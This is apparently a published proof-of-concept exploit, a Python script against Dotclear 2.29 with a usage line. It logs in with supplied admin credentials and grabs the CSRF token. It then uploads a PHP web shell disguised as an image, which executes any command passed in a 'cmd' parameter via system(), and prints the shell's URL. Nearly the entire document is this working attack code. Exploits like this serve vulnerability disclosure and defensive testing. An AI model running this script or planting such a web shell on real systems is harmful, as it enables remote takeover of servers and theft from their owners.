Dotclear 2.29 - Remote Code Execution (RCE)

1. # Exploit Title: Dotclear 2.29 - Remote Code Execution (RCE)
2. # Discovered by: Ahmet Ümit BAYRAM
3. # Discovered Date: 26.04.2024
4. # Vendor Homepage: https://git.dotclear.org/explore/repos
5. # Software Link: https://github.com/dotclear/dotclear/archive/refs/heads/master.zip
6. # Tested Version: v2.29 (latest)
7. # Tested on: MacOS
8.  
9. import requests
10. import time
11. import random
12. import string
13. from bs4 import BeautifulSoup
14.  
15. def generate_filename(extension=".inc"):
16. return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) +
17. extension
18.  
19. def get_csrf_token(response_text):
20. soup = BeautifulSoup(response_text, 'html.parser')
21. token = soup.find('input', {'name': 'xd_check'})
22. return token['value'] if token else None
23.  
24. def login(base_url, username, password):
25. print("Exploiting...")
26. time.sleep(1)
27. print("Logging in...")
28. time.sleep(1)
29. session = requests.Session()
30. login_data = {
31. "user_id": username,
32. "user_pwd": password
33. }
34. login_url = f"{base_url}/admin/index.php?process=Auth"
35. login_response = session.post(login_url, data=login_data)
36. if "Logout" in login_response.text:
37. print("Login Successful!")
38. return session
39. else:
40. print("Login Failed!")
41. return None
42.  
43. def upload_file(session, base_url, filename):
44. print("Shell Preparing...")
45. time.sleep(1)
46. boundary = "---------------------------376201441124932790524235275389"
47. headers = {
48. "Content-Type": f"multipart/form-data; boundary={boundary}",
49. "X-Requested-With": "XMLHttpRequest"
50. }
51. csrf_token = get_csrf_token(session.get(f"{base_url}
52. /admin/index.php?process=Media").text)
53. payload = (
54. f"--{boundary}\r\n"
55. f"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n"
56. f"2097152\r\n"
57. f"--{boundary}\r\n"
58. f"Content-Disposition: form-data; name=\"xd_check\"\r\n\r\n"
59. f"{csrf_token}\r\n"
60. f"--{boundary}\r\n"
61. f"Content-Disposition: form-data; name=\"upfile[]\"; filename=\"{filename}
62. \"\r\n"
63. f"Content-Type: image/jpeg\r\n\r\n"
64. "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo
65. basename($_SERVER['PHP_SELF']); ?>\">\n"
66. "<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input
67. type=\"SUBMIT\" value=\"Execute\">\n"
68. "</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n}
69. \n?>\n</pre>\n</body>\n</html>\r\n"
70. f"--{boundary}--\r\n"
71. )
72. upload_response = session.post(f"{base_url}
73. /admin/index.php?process=Media&sortby=name&order=asc&nb=30&page=1&q=&file_mode=grid&file_type=&plugin_id=&popup=0&select=0",
74. headers=headers, data=payload.encode('utf-8'))
75.  
76. if upload_response.status_code == 200:
77. print(f"Your Shell is Ready: {base_url}/public/{filename}")
78. else:
79. print("Exploit Failed!")
80.  
81. def main(base_url, username, password):
82. filename = generate_filename()
83. session = login(base_url, username, password)
84. if session:
85. upload_file(session, base_url, filename)
86.  
87. if __name__ == "__main__":
88. import sys
89. if len(sys.argv) != 4:
90. print("Usage: python script.py <siteurl> <username> <password>")
91. else:
92. base_url = sys.argv[1]
93. username = sys.argv[2]
94. password = sys.argv[3]
95. main(base_url, username, password)
96.